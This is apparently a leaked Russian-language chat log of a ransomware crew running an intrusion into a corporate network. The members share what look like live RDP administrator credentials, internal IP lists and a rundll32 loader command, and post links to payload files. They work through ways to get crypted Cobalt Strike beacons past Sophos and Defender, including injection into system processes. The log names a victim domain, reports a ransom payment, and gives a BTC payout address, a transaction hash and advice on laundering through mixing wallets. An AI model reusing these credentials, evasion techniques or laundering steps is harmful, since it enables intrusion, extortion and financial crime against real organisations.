[2023-11-18 08:40:20] @usernameff:matrix.bestflowers247.online: ```
192.168.1.4
192.168.1.41
192.168.1.83
192.168.1.95
192.168.1.105
192.168.1.3
192.168.1.8
192.168.1.9
192.168.1.59
192.168.1.21
192.168.1.65
```
--------------------
[2023-11-18 12:08:20] @usernamegg:matrix.bestflowers247.online: тут ?
--------------------
[2023-11-18 12:08:26] @usernamegg:matrix.bestflowers247.online: id:0c3dea3e-8973-44bb-bd6e-a1521f32c9b3
--------------------
[2023-11-18 12:08:42] @usernamegg:matrix.bestflowers247.online: декрипт для версии BASTA 2.0
--------------------
[2023-11-18 12:30:46] @usernamegg:matrix.bestflowers247.online: залей мне сюда по ним декрипт
--------------------
[2023-11-18 13:03:18] @usernamegg:matrix.bestflowers247.online: ты тут ?
--------------------
[2023-11-18 13:03:21] @usernamegg:matrix.bestflowers247.online: софос обойдем ?
--------------------
[2023-11-18 13:03:59] @usernameyy:matrix.bestflowers247.online: привет)
--------------------
[2023-11-18 13:04:04] @usernameyy:matrix.bestflowers247.online: я думал важное что то, сказал бы
--------------------
[2023-11-18 13:04:05] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 13:04:07] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2023-11-18 13:04:17] @usernamegg:matrix.bestflowers247.online: тут важно да
--------------------
[2023-11-18 13:04:32] @usernameyy:matrix.bestflowers247.online: так декрипт от б2 работает в панеле же
--------------------
[2023-11-18 13:04:32] @usernamegg:matrix.bestflowers247.online: сетка заплатила 4m
--------------------
[2023-11-18 13:04:39] @usernamegg:matrix.bestflowers247.online: надо востановить ребят
--------------------
[2023-11-18 13:04:46] @usernameyy:matrix.bestflowers247.online: ща зайду в тор сек
--------------------
[2023-11-18 13:04:47] @usernamegg:matrix.bestflowers247.online: аа
--------------------
[2023-11-18 13:06:02] @usernamegg:matrix.bestflowers247.online: rundll32.exe dll.dll,Throw
дллки еще, подписал их тож
--------------------
[2023-11-18 13:06:24] @usernamegg:matrix.bestflowers247.online: payload_x86_23cob_cr.bin
--------------------
[2023-11-18 13:09:19] @usernameyy:matrix.bestflowers247.online: дай семплы их файлов
--------------------
[2023-11-18 13:09:25] @usernameyy:matrix.bestflowers247.online: вы не через панель их кидали, они удалены
--------------------
[2023-11-18 13:12:12] @usernameyy:matrix.bestflowers247.online: я сделал декрипты бб2, но желательно их проверить, я им напишу об этом в чате
--------------------
[2023-11-18 13:12:27] @usernameyy:matrix.bestflowers247.online: сэмплы у тебя вряд ли  сохранились, надо просить через панель всегда кидать
--------------------
[2023-11-18 13:14:09] @usernamegg:matrix.bestflowers247.online: +++
--------------------
[2023-11-18 13:14:46] @usernamegg:matrix.bestflowers247.online: полную инструкцию дай им
--------------------
[2023-11-18 13:14:53] @usernameyy:matrix.bestflowers247.online: она в архиве
--------------------
[2023-11-18 13:15:01] @usernameyy:matrix.bestflowers247.online: я им написал об этом
--------------------
[2023-11-18 13:16:55] @usernamegg:matrix.bestflowers247.online: сейчас дам тебе креды и нагрузку какую надо закриптовать и позвать
--------------------
[2023-11-18 13:16:55] @usernamejj:matrix.bestflowers247.online: ```
85.239.60.107:56777
Administrator
A74q1LSFl59u2EeHzn
26/11/2023
```
--------------------
[2023-11-18 13:17:01] @usernameyy:matrix.bestflowers247.online: я пойду на праздник, если хочешь можешь забежать на стейк к нам в мой любимый ресторан в 18, там будут моя семья и близкие друзья)
--------------------
[2023-11-18 13:19:56] @usernamegg:matrix.bestflowers247.online: 85.239.60.107:56777
Administrator
A74q1LSFl59u2EeHzn
26/11/2023

--------------------
[2023-11-18 13:20:07] @usernamegg:matrix.bestflowers247.online: доступ к рдп
--------------------
[2023-11-18 13:20:11] @usernamegg:matrix.bestflowers247.online: зайди там все будет открыто
--------------------
[2023-11-18 13:32:00] @usernamegg:matrix.bestflowers247.online: спасибо за приглашение
--------------------
[2023-11-18 13:32:02] @usernamegg:matrix.bestflowers247.online: с праздником
--------------------
[2023-11-18 13:32:16] @usernamejj:matrix.bestflowers247.online: payload_x86_c22.bin
--------------------
[2023-11-18 13:32:37] @usernamegg:matrix.bestflowers247.online: payload_x86_c22.bin
--------------------
[2023-11-18 13:32:58] @usernamegg:matrix.bestflowers247.online: вот этот криптани и позови и возови
--------------------
[2023-11-18 13:35:32] @usernamejj:matrix.bestflowers247.online: payload_x86_dns4.bin
--------------------
[2023-11-18 13:35:44] @usernamegg:matrix.bestflowers247.online: payload_x86_dns4.bin
--------------------
[2023-11-18 13:35:59] @usernamejj:matrix.bestflowers247.online: `midfield.com.au`
--------------------
[2023-11-18 14:08:58] @burito:matrix.bestflowers247.online: привет. щас
--------------------
[2023-11-18 14:09:31] @burito:matrix.bestflowers247.online: позови меня в ночи прийду...
--------------------
[2023-11-18 14:09:33] @burito:matrix.bestflowers247.online: )))
--------------------
[2023-11-18 14:09:39] @usernamegg:matrix.bestflowers247.online: да да
--------------------
[2023-11-18 14:09:40] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2023-11-18 14:09:42] @usernamegg:matrix.bestflowers247.online: ты зашел
--------------------
[2023-11-18 14:09:48] @burito:matrix.bestflowers247.online: да щас же
--------------------
[2023-11-18 14:09:50] @usernamegg:matrix.bestflowers247.online: смотри там твой любимы софос твоит
--------------------
[2023-11-18 14:09:57] @usernamegg:matrix.bestflowers247.online: * смотри там твой любимы софос стоит
--------------------
[2023-11-18 14:10:12] @usernamegg:matrix.bestflowers247.online: позовем ?
--------------------
[2023-11-18 14:10:22] @usernamegg:matrix.bestflowers247.online: на dns ты впрошлый раз позвать смог
--------------------
[2023-11-18 14:10:42] @burito:matrix.bestflowers247.online: щас попробуем
--------------------
[2023-11-18 14:11:55] @burito:matrix.bestflowers247.online: а ты мои пробовал и ничего?
--------------------
[2023-11-18 14:14:07] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 14:14:13] @usernamegg:matrix.bestflowers247.online: твои там лежат
--------------------
[2023-11-18 14:14:14] @usernamegg:matrix.bestflowers247.online: аа
--------------------
[2023-11-18 14:14:22] @usernamegg:matrix.bestflowers247.online: я ехе не запускал
--------------------
[2023-11-18 14:14:43] @burito:matrix.bestflowers247.online: давай щас ехе попробую
--------------------
[2023-11-18 14:14:51] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-18 14:14:58] @usernamegg:matrix.bestflowers247.online: скажи как чекать
--------------------
[2023-11-18 14:15:18] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

из этих файлов сделаешь ?
--------------------
[2023-11-18 14:15:24] @burito:matrix.bestflowers247.online: да
--------------------
[2023-11-18 14:15:41] @usernamegg:matrix.bestflowers247.online: жду
--------------------
[2023-11-18 14:21:53] @usernamegg:matrix.bestflowers247.online: скажи как запустишь
--------------------
[2023-11-18 14:25:34] @burito:matrix.bestflowers247.online: да, мин
--------------------
[2023-11-18 14:25:48] @burito:matrix.bestflowers247.online: процесс експлорер гасит даже софос
--------------------
[2023-11-18 14:26:03] @burito:matrix.bestflowers247.online: хочу видеть что стартует файл или нет
--------------------
[2023-11-18 14:29:24] @burito:matrix.bestflowers247.online: ехе не дает запустить, щас другое попробую
--------------------
[2023-11-18 14:29:39] @usernamegg:matrix.bestflowers247.online: давай дроппер может от лоадера запустим ?
--------------------
[2023-11-18 14:29:55] @usernamegg:matrix.bestflowers247.online: > <@burito:matrix.bestflowers247.online> sent a file.

попробуй стартани его сейчас
--------------------
[2023-11-18 14:29:57] @usernamegg:matrix.bestflowers247.online: твой же крипт
--------------------
[2023-11-18 14:30:04] @burito:matrix.bestflowers247.online: ну щас другой шелл запилю, если нет, но его тогда
--------------------
[2023-11-18 14:30:10] @usernamegg:matrix.bestflowers247.online: если он в лоадер придет я уже его далье толку в рабоут через инжект
--------------------
[2023-11-18 14:30:19] @burito:matrix.bestflowers247.online: ладно, щас
--------------------
[2023-11-18 14:30:22] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-18 14:32:23] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2023-11-18 14:36:37] @burito:matrix.bestflowers247.online: дроппер тоже гасит все
--------------------
[2023-11-18 14:36:49] @burito:matrix.bestflowers247.online: хм...
--------------------
[2023-11-18 14:36:59] @burito:matrix.bestflowers247.online: давай кобу сделаю разные варианты
--------------------
[2023-11-18 14:37:19] @burito:matrix.bestflowers247.online: как стартану что-то скажу
--------------------
[2023-11-18 14:41:43] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 14:41:51] @usernamegg:matrix.bestflowers247.online: жду
--------------------
[2023-11-18 14:56:27] @burito:matrix.bestflowers247.online: да бля он тут совсем зверь
--------------------
[2023-11-18 14:57:41] @burito:matrix.bestflowers247.online: шелл пробую через лоадер, а лоадер через дебагер, и сразу же гасит сам дебагер))
--------------------
[2023-11-18 14:57:54] @burito:matrix.bestflowers247.online: лоадер подписал, та же херня..
--------------------
[2023-11-18 14:58:19] @burito:matrix.bestflowers247.online: даж не знаю как запустить хоть что-то...
--------------------
[2023-11-18 15:03:07] @burito:matrix.bestflowers247.online: бля он даже гасит хром, через который я качнул ехе ))) жесть
--------------------
[2023-11-18 15:15:32] @burito:matrix.bestflowers247.online: ндээ...
--------------------
[2023-11-18 15:16:23] @usernamegg:matrix.bestflowers247.online: что больше нет вариантов?ты же в прошлый раз позвал тачку софасом
--------------------
[2023-11-18 15:16:52] @burito:matrix.bestflowers247.online: да тут он вообще ебанутый. он даже ольку гасит
--------------------
[2023-11-18 15:16:55] @burito:matrix.bestflowers247.online: дебагер
--------------------
[2023-11-18 15:17:05] @usernamegg:matrix.bestflowers247.online: может сделать нагрузку .bin
--------------------
[2023-11-18 15:17:11] @burito:matrix.bestflowers247.online: щас попробую в ехе легал пихануть шелл
--------------------
[2023-11-18 15:17:17] @burito:matrix.bestflowers247.online: да это пофиг
--------------------
[2023-11-18 15:17:31] @burito:matrix.bestflowers247.online: тут релаьно любое ехе длл гасит не думая
--------------------
[2023-11-18 15:17:52] @usernamegg:matrix.bestflowers247.online: от мсф может сделать нагрузку ты ее криптонешь и попробуем позвать
--------------------
[2023-11-18 15:18:23] @burito:matrix.bestflowers247.online: щас в легал попробую пихануть
--------------------
[2023-11-18 15:18:34] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-11-18 15:18:58] @usernamegg:matrix.bestflowers247.online: js ?
--------------------
[2023-11-18 15:19:00] @usernamegg:matrix.bestflowers247.online: может
--------------------
[2023-11-18 15:19:04] @usernamegg:matrix.bestflowers247.online: msi
--------------------
[2023-11-18 15:19:10] @usernamegg:matrix.bestflowers247.online: от даргейта
--------------------
[2023-11-18 15:19:12] @burito:matrix.bestflowers247.online: я ж джаву не умею
--------------------
[2023-11-18 15:19:16] @burito:matrix.bestflowers247.online: мси тоже
--------------------
[2023-11-18 15:19:17] @usernamegg:matrix.bestflowers247.online: ps1
--------------------
[2023-11-18 15:19:24] @burito:matrix.bestflowers247.online: тоже_
--------------------
[2023-11-18 15:19:41] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-11-18 15:19:50] @usernamegg:matrix.bestflowers247.online: найдите абсуфикатор ps1
--------------------
[2023-11-18 15:20:25] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-11-18 в 18.20.17.png
--------------------
[2023-11-18 15:22:27] @usernamejj:matrix.bestflowers247.online: посмотрю
--------------------
[2023-11-18 15:22:31] @burito:matrix.bestflowers247.online: щас.. ехешку дает стартануть. в нее пихануть кобу надо
--------------------
[2023-11-18 15:23:04] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 16:01:19] @usernamegg:matrix.bestflowers247.online: ну что есть мысли?
--------------------
[2023-11-18 16:02:32] @burito:matrix.bestflowers247.online: пытаюсь через ехешку, но тоже гасит все варианты
--------------------
[2023-11-18 16:02:44] @burito:matrix.bestflowers247.online: щас еще пробую
--------------------
[2023-11-18 16:02:56] @usernamegg:matrix.bestflowers247.online: хорошо я жду
--------------------
[2023-11-18 16:03:11] @usernamegg:matrix.bestflowers247.online: я пока не захожу на рдп
--------------------
[2023-11-18 16:03:51] @usernamegg:matrix.bestflowers247.online: у меня есть два варианта msi i js
--------------------
[2023-11-18 16:04:10] @burito:matrix.bestflowers247.online: но они ж палятся?
--------------------
[2023-11-18 16:04:21] @burito:matrix.bestflowers247.online: я их не уметь(
--------------------
[2023-11-18 16:04:55] @usernamegg:matrix.bestflowers247.online: как вариант надо попробовать
--------------------
[2023-11-18 16:05:05] @usernamegg:matrix.bestflowers247.online: а я уметь
--------------------
[2023-11-18 16:24:01] @burito:matrix.bestflowers247.online: что-то коннект с 10.1... пропал
--------------------
[2023-11-18 16:24:42] @burito:matrix.bestflowers247.online: не, нифига не получается, там софос какой-то зверюга
--------------------
[2023-11-18 16:25:18] @w:matrixtcFJHPDblmt2rg.network: Привет
--------------------
[2023-11-18 16:25:23] @w:matrixtcFJHPDblmt2rg.network: замотался что то)
--------------------
[2023-11-18 16:25:24] @w:matrixtcFJHPDblmt2rg.network: тут
--------------------
[2023-11-18 16:25:29] @w:matrixtcFJHPDblmt2rg.network: щас перекушу быстро и напишу
--------------------
[2023-11-18 17:54:35] @usernamegg:matrix.bestflowers247.online: ((
--------------------
[2023-11-18 17:54:41] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 17:54:56] @burito:matrix.bestflowers247.online: та да
--------------------
[2023-11-18 17:55:10] @burito:matrix.bestflowers247.online: попробуй скрипт и мси
--------------------
[2023-11-18 17:55:27] @burito:matrix.bestflowers247.online: но там походу отвалился уже клиент
--------------------
[2023-11-18 17:57:14] @burito:matrix.bestflowers247.online: щас кобу пошифрую и попробую еще в ехешку ее запилить
--------------------
[2023-11-18 17:59:06] @w:matrixtcFJHPDblmt2rg.network: Братец, кстати, я в понедельник буду до 2 по МСК, потом надо будет отьехать до вечера, решить моменты с жительством и так далее
--------------------
[2023-11-18 17:59:25] @w:matrixtcFJHPDblmt2rg.network: доки нормально надо оформить, а то я хер его еще сколько будет все длиться у меня на родинах
--------------------
[2023-11-18 18:00:17] @w:matrixtcFJHPDblmt2rg.network: сделаю вам билды, инфру добавлю, все что надо сделаю до 2-ух по МСК
--------------------
[2023-11-18 18:03:14] @w:matrixtcFJHPDblmt2rg.network: скоро уже буду проливать на севраки эти вайты и настраивать все
--------------------
[2023-11-18 18:03:24] @w:matrixtcFJHPDblmt2rg.network: ну и по msi сделаю, чтобы могли на выдачу подписаный поставить
--------------------
[2023-11-18 18:03:29] @w:matrixtcFJHPDblmt2rg.network: обычный msi сделаем и все
--------------------
[2023-11-18 18:03:29] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 18:03:30] @w:matrixtcFJHPDblmt2rg.network: достаточно его будет
--------------------
[2023-11-18 18:03:55] @w:matrixtcFJHPDblmt2rg.network: По поводу трафика тебе щас распишу, чтобы ты вьехал и тебе все было макисмально понятно
--------------------
[2023-11-18 18:04:01] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-18 18:06:12] @usernamegg:matrix.bestflowers247.online: кошеь свой дай
--------------------
[2023-11-18 18:06:17] @usernamegg:matrix.bestflowers247.online: у нас выплата сегодня была
--------------------
[2023-11-18 18:06:25] @usernamegg:matrix.bestflowers247.online: правда бот был не с айпики но все же
--------------------
[2023-11-18 18:06:50] @usernamegg:matrix.bestflowers247.online: ты с нами хначит тебе тодже должно капать с нашей работы
--------------------
[2023-11-18 18:07:30] @usernamegg:matrix.bestflowers247.online: и что бы ты понимал что я настроен на продуктивную и честную работу со своими партнерами
--------------------
[2023-11-18 18:07:57] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> правда бот был не с айпики но все же

Спасибо большое
--------------------
[2023-11-18 18:08:03] @w:matrixtcFJHPDblmt2rg.network: Очень ценю
--------------------
[2023-11-18 18:08:20] @w:matrixtcFJHPDblmt2rg.network: bc1q8elau4s44sn5amwatvlxphnw74la5jrat7a5u5
--------------------
[2023-11-18 18:08:39] @usernamegg:matrix.bestflowers247.online: 267fd9c2bdb7e1e3fd7d5fd8a8c4cb12918f5b84b11ba51d67b1f337165c004d
--------------------
[2023-11-18 18:08:43] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> и что бы ты понимал что я настроен на продуктивную и честную работу со своими партнерами

да, взаимно, тоже работаю максимально честно и продуктивно)
--------------------
[2023-11-18 18:08:46] @w:matrixtcFJHPDblmt2rg.network: все в одной лодке
--------------------
[2023-11-18 18:08:56] @usernamegg:matrix.bestflowers247.online: 1 btc
--------------------
[2023-11-18 18:09:02] @w:matrixtcFJHPDblmt2rg.network: скоро тебе полностью опишу по трафику
--------------------
[2023-11-18 18:09:15] @usernamegg:matrix.bestflowers247.online: $ 36.658
--------------------
[2023-11-18 18:09:36] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 18:10:08] @w:matrixtcFJHPDblmt2rg.network: Пришло, спасибо большое
--------------------
[2023-11-18 18:10:12] @w:matrixtcFJHPDblmt2rg.network: Да, спасибо большое
--------------------
[2023-11-18 18:18:09] @usernamegg:matrix.bestflowers247.online: нет , давай сам
--------------------
[2023-11-18 18:18:14] @w:matrixtcFJHPDblmt2rg.network: они миксованые?
--------------------
[2023-11-18 18:18:39] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 18:19:00] @usernamegg:matrix.bestflowers247.online: https://atomicwallet.io/downloads
--------------------
[2023-11-18 18:19:08] @w:matrixtcFJHPDblmt2rg.network: ага, окей
--------------------
[2023-11-18 18:19:17] @w:matrixtcFJHPDblmt2rg.network: а можешь посоветовать может какой,а то я обычно миксую у ребят
--------------------
[2023-11-18 18:19:23] @w:matrixtcFJHPDblmt2rg.network: они мне сразу TRC20 или BTC чистый кидают
--------------------
[2023-11-18 18:19:36] @usernamegg:matrix.bestflowers247.online: https://www.exodus.com
--------------------
[2023-11-18 18:19:41] @w:matrixtcFJHPDblmt2rg.network: ага, давай
--------------------
[2023-11-18 18:20:01] @usernamegg:matrix.bestflowers247.online: в
--------------------
[2023-11-18 18:20:04] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 18:20:10] @usernamegg:matrix.bestflowers247.online: вот тут сразу делай себе чистый
--------------------
[2023-11-18 18:20:12] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> https://atomicwallet.io/downloads

а тут прям есть миксер сразу?
--------------------
[2023-11-18 18:20:33] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> https://www.exodus.com

тут объем больше
--------------------
[2023-11-18 18:20:41] @usernamegg:matrix.bestflowers247.online: оба поставь
--------------------
[2023-11-18 18:20:48] @usernamegg:matrix.bestflowers247.online: и там и там побалуйся
--------------------
[2023-11-18 18:21:45] @w:matrixtcFJHPDblmt2rg.network: то есть туда просто на BTC переводить и что дальше делать?
--------------------
[2023-11-18 18:21:47] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> то есть туда просто на BTC переводить и что дальше делать?

меняй на TRC20
--------------------
[2023-11-18 18:21:52] @w:matrixtcFJHPDblmt2rg.network: просто не совсем понял
--------------------
[2023-11-18 18:22:33] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-11-18 в 21.22.24.png
--------------------
[2023-11-18 18:23:01] @w:matrixtcFJHPDblmt2rg.network: ага, он AML не смотрит получается, да?
--------------------
[2023-11-18 18:23:04] @usernamegg:matrix.bestflowers247.online: вот у меня на команду зп чиститься сейчас
--------------------
[2023-11-18 18:24:09] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 18:24:14] @usernamegg:matrix.bestflowers247.online: в обоих попробуй
--------------------
[2023-11-18 18:24:37] @w:matrixtcFJHPDblmt2rg.network: ага, все понял
--------------------
[2023-11-18 18:24:45] @w:matrixtcFJHPDblmt2rg.network: нормально, щас попробую
--------------------
[2023-11-18 18:28:44] @w:matrixtcFJHPDblmt2rg.network: щас как раз почти все долги закрою свои, спасибо большое еще раз)
--------------------
[2023-11-18 18:32:38] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 18:32:45] @usernamegg:matrix.bestflowers247.online: я рад
--------------------
[2023-11-18 18:32:50] @usernamegg:matrix.bestflowers247.online: давай трафом займемся
--------------------
[2023-11-18 18:32:58] @usernamegg:matrix.bestflowers247.online: всех траферов с форума соберем и привлечем
--------------------
[2023-11-18 18:33:01] @usernamegg:matrix.bestflowers247.online: будем много лить
--------------------
[2023-11-18 18:33:07] @usernamegg:matrix.bestflowers247.online: я просто понять все хочу как это делать
--------------------
[2023-11-18 18:34:24] @w:matrixtcFJHPDblmt2rg.network: я тебе скоро скину полное описание
--------------------
[2023-11-18 18:34:29] @w:matrixtcFJHPDblmt2rg.network: считай как мануал
--------------------
[2023-11-18 18:53:37] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-11-18 18:53:40] @usernamegg:matrix.bestflowers247.online: сейчас попробую
--------------------
[2023-11-18 18:53:49] @burito:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 18:54:36] @usernamegg:matrix.bestflowers247.online: я зашел
--------------------
[2023-11-18 18:55:10] @usernamegg:matrix.bestflowers247.online: от метасплойта сделаю ?
--------------------
[2023-11-18 18:55:14] @usernamegg:matrix.bestflowers247.online: еще нагрузку
--------------------
[2023-11-18 18:55:34] @burito:matrix.bestflowers247.online: мне?
--------------------
[2023-11-18 18:55:42] @burito:matrix.bestflowers247.online: я с кобой попробую
--------------------
[2023-11-18 18:55:56] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 18:55:58] @usernamegg:matrix.bestflowers247.online: ладно
--------------------
[2023-11-18 18:59:09] @usernamegg:matrix.bestflowers247.online: http://temp.sh/HBEZa/away.js
--------------------
[2023-11-18 19:00:40] @usernamegg:matrix.bestflowers247.online: js сразу уебал он
--------------------
[2023-11-18 19:00:42] @usernamegg:matrix.bestflowers247.online: ебучий
--------------------
[2023-11-18 19:01:05] @burito:matrix.bestflowers247.online: ))
--------------------
[2023-11-18 19:01:09] @usernamegg:matrix.bestflowers247.online: http://temp.sh/bQoCW/000000000.exe
--------------------
[2023-11-18 19:01:10] @burito:matrix.bestflowers247.online: скотина
--------------------
[2023-11-18 19:01:14] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 19:01:16] @usernamegg:matrix.bestflowers247.online: еще какая
--------------------
[2023-11-18 19:02:48] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-11-18 19:02:50] @usernamegg:matrix.bestflowers247.online: братец
--------------------
[2023-11-18 19:02:51] @usernamegg:matrix.bestflowers247.online: помоги
--------------------
[2023-11-18 19:02:52] @usernamegg:matrix.bestflowers247.online: смотри
--------------------
[2023-11-18 19:02:56] @usernamegg:matrix.bestflowers247.online: есть мясница на 600 м
--------------------
[2023-11-18 19:02:59] @usernamegg:matrix.bestflowers247.online: тачка по рдн
--------------------
[2023-11-18 19:03:02] @usernamegg:matrix.bestflowers247.online: там ебучий софас
--------------------
[2023-11-18 19:03:08] @usernamegg:matrix.bestflowers247.online: уже всю голову нам сделал
--------------------
[2023-11-18 19:03:11] @usernamegg:matrix.bestflowers247.online: не знаю как позвать
--------------------
[2023-11-18 19:03:17] @usernamegg:matrix.bestflowers247.online: бурито уже там с дебагером сидит
--------------------
[2023-11-18 19:03:21] @usernamegg:matrix.bestflowers247.online: пытаеться позвать
--------------------
[2023-11-18 19:03:22] @usernamegg:matrix.bestflowers247.online: нихуя
--------------------
[2023-11-18 19:03:38] @usernamegg:matrix.bestflowers247.online: может в айпику как то его затянть какой либо нагрузкой можно ?
--------------------
[2023-11-18 19:03:55] @usernamegg:matrix.bestflowers247.online: инжектор туда накатить который в айпике встроен
--------------------
[2023-11-18 19:04:00] @usernamegg:matrix.bestflowers247.online: и заинжектить в процесс кобу
--------------------
[2023-11-18 19:04:11] @usernamegg:matrix.bestflowers247.online: спрататься на свхост или винлагон
--------------------
[2023-11-18 19:04:17] @usernamegg:matrix.bestflowers247.online: что думаешь , помоги)
--------------------
[2023-11-18 19:04:56] @usernamegg:matrix.bestflowers247.online: деф еще заорал на ехе
--------------------
[2023-11-18 19:04:59] @usernamegg:matrix.bestflowers247.online: от даргейта
--------------------
[2023-11-18 19:05:05] @usernamegg:matrix.bestflowers247.online: сейчас удалю деф оттуда)
--------------------
[2023-11-18 19:05:26] @burito:matrix.bestflowers247.online: давай)
--------------------
[2023-11-18 19:05:39] @usernamegg:matrix.bestflowers247.online: http://temp.sh/nEslu/msi123.msi
--------------------
[2023-11-18 19:12:09] @usernamegg:matrix.bestflowers247.online: beacon
--------------------
[2023-11-18 19:13:25] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2023-11-18 19:13:32] @usernamegg:matrix.bestflowers247.online: есть еще варианты ?
--------------------
[2023-11-18 19:13:37] @usernamegg:matrix.bestflowers247.online: удалил
--------------------
[2023-11-18 19:14:03] @usernamegg:matrix.bestflowers247.online: бля там еще у дефа клауд был включен
--------------------
[2023-11-18 19:14:07] @usernamegg:matrix.bestflowers247.online: ну что скажешь
--------------------
[2023-11-18 19:14:29] @burito:matrix.bestflowers247.online: щас кобу в ехе запилю  и проверю
--------------------
[2023-11-18 19:15:04] @usernamegg:matrix.bestflowers247.online: beacon_x86.dll
--------------------
[2023-11-18 19:15:05] @usernamegg:matrix.bestflowers247.online: artifact_x86.dll
--------------------
[2023-11-18 19:15:09] @usernamegg:matrix.bestflowers247.online: вот эти сделай
--------------------
[2023-11-18 19:15:48] @burito:matrix.bestflowers247.online: блин ну я ж ту, что дал делаю под это дело
--------------------
[2023-11-18 19:16:19] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 19:16:21] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2023-11-18 19:16:28] @usernamegg:matrix.bestflowers247.online: скажи как тебе надо будет на рдп
--------------------
[2023-11-18 19:18:11] @burito:matrix.bestflowers247.online: ок
--------------------
[2023-11-18 19:25:03] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> скажи как тебе надо будет на рдп

давай
--------------------
[2023-11-18 19:25:18] @usernamegg:matrix.bestflowers247.online: заходи
--------------------
[2023-11-18 19:26:47] @burito:matrix.bestflowers247.online: так 10.1.128 мне ж открой)
--------------------
[2023-11-18 19:27:15] @usernamegg:matrix.bestflowers247.online: не понял
--------------------
[2023-11-18 19:27:19] @usernamegg:matrix.bestflowers247.online: все отрыто там
--------------------
[2023-11-18 19:27:31] @usernamegg:matrix.bestflowers247.online: заходи на рдп
--------------------
[2023-11-18 19:27:43] @burito:matrix.bestflowers247.online: 85.239.60.107:56777 сюда зашел
--------------------
[2023-11-18 19:27:49] @burito:matrix.bestflowers247.online: там нет фососа)
--------------------
[2023-11-18 19:28:10] @usernamegg:matrix.bestflowers247.online: 85.239.60.107:56777
Administrator
A74q1LSFl59u2EeHzn
--------------------
[2023-11-18 19:28:22] @usernamegg:matrix.bestflowers247.online: ты не туда зашел
--------------------
[2023-11-18 19:28:23] @usernamegg:matrix.bestflowers247.online: 85.239.60.107:56777
Administrator
A74q1LSFl59u2EeHzn
--------------------
[2023-11-18 19:28:29] @usernamegg:matrix.bestflowers247.online: вот сюда надо
--------------------
[2023-11-18 19:28:31] @usernamegg:matrix.bestflowers247.online: заходи
--------------------
[2023-11-18 19:28:34] @usernamegg:matrix.bestflowers247.online: посмотри где ты
--------------------
[2023-11-18 19:28:38] @usernamegg:matrix.bestflowers247.online: меня с рдп не кильнуло
--------------------
[2023-11-18 19:28:54] @usernamegg:matrix.bestflowers247.online: _)))
--------------------
[2023-11-18 19:29:02] @usernamegg:matrix.bestflowers247.online: проверь )
--------------------
[2023-11-18 19:29:04] @usernamegg:matrix.bestflowers247.online: ты не там
--------------------
[2023-11-18 19:29:38] @burito:matrix.bestflowers247.online: так сюда и захожу же, там ремоут на 10.1... должен быть
--------------------
[2023-11-18 19:29:48] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> 85.239.60.107:56777
> Administrator
> A74q1LSFl59u2EeHzn

вот здесь я
--------------------
[2023-11-18 19:29:54] @usernamegg:matrix.bestflowers247.online: выйди
--------------------
[2023-11-18 19:30:06] @burito:matrix.bestflowers247.online: вышел
--------------------
[2023-11-18 19:30:10] @usernamegg:matrix.bestflowers247.online: заходи
--------------------
[2023-11-18 19:30:14] @usernamegg:matrix.bestflowers247.online: там мультиссесия
--------------------
[2023-11-18 19:30:27] @usernamegg:matrix.bestflowers247.online: там все открыто
--------------------
[2023-11-18 19:30:59] @burito:matrix.bestflowers247.online: да нет нифига)) ну окно ремоут на 10.1.. и просит пасс
--------------------
[2023-11-18 19:31:17] @usernamegg:matrix.bestflowers247.online: вот сейчас презайди
--------------------
[2023-11-18 19:31:20] @usernamegg:matrix.bestflowers247.online: все долно норм быть
--------------------
[2023-11-18 19:32:17] @burito:matrix.bestflowers247.online: во
--------------------
[2023-11-18 19:32:22] @usernamegg:matrix.bestflowers247.online: збс
--------------------
[2023-11-18 19:32:23] @usernamegg:matrix.bestflowers247.online: пробуй
--------------------
[2023-11-18 19:32:24] @burito:matrix.bestflowers247.online: норм
--------------------
[2023-11-18 19:32:28] @usernamegg:matrix.bestflowers247.online: мультисессия
--------------------
[2023-11-18 19:32:30] @burito:matrix.bestflowers247.online: щас..
--------------------
[2023-11-18 19:32:47] @burito:matrix.bestflowers247.online: чето она не мульти была...
--------------------
[2023-11-18 19:32:57] @burito:matrix.bestflowers247.online: щас ехешку затестим
--------------------
[2023-11-18 19:33:02] @usernamegg:matrix.bestflowers247.online: давай
--------------------
